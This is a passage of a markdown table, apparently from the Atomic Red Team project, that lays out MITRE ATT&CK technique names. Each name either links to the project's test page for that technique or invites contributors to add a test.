| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Chat Messages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Indirect Command Execution](../../T1202/T1202.md) | Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | | | | | |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Impair Defenses](../../T1562/T1562.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | | |
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | [Forced Authentication](../../T1187/T1187.md) | | | | | | |
| | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Time Providers](../../T1547.003/T1547.003.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [OS Credential Dumping: /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | | |
| | | Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | |
| | | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
| | | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
| | | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) | | | | | | |
| | | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
| | | Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes List Secrets](../../T1552.007/T1552.007.md) | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | | | | | | | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
| | | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | | |
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution](../../T1546/T1546.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | | | | | | | |
| | | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
| | | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create Account: Cloud Account](../../T1136.003/T1136.003.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Account Manipulation](../../T1098/T1098.md) | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Plist File Modification](../../T1647/T1647.md) | | | | | | | |
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [IIS Components](../../T1505.004/T1505.004.md) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Build Image on Host](../../T1612/T1612.md) | | | | | | | |
| | | [Event Triggered Execution](../../T1546/T1546.md) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Authentication Package](../../T1547.002/T1547.002.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
| | | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
| | | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | | |
| | | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [BITS Jobs](../../T1197/T1197.md) | | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
